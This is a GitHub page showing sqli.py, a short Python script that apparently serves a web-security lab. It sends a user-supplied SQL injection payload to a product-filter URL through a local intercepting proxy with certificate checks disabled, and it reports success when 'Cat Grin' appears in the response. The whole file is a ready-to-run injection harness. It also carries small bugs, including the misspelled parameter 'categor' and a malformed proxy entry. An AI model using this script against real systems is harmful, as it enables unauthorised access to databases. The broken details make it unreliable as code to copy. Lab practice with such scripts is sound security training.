-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathsqli.py
More file actions
31 lines (25 loc) · 855 Bytes
/
sqli.py
File metadata and controls
31 lines (25 loc) · 855 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
import requests
import urllib3
import sys
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
proxies = {'http':'//127.0.0.1:8080' , 'https':'127.0.0.1:8080'}
def exploit_sqli(url , payload):
uri = '/filter?categor='
r = requests.get(url + uri + payload , verify=False , proxies=proxies)
if "Cat Grin" in r.text:
return True
else:
return False
if __name__ == "__main__":
try:
url = sys.argv[1].strip()
payload = sys.argv[2].strip()
except IndexError:
print("[-] Usage : %s <url> <payload>" % sys.argv[0])
print('[-] Example : %s www.dummy.com "1=1"' % sys.argv[0])
sys.exit(-1)
if exploit_sqli(url , payload):
print("[+] SQL injection is successfull ")
else :
print("[-] SQL injection is unsuccessfull" )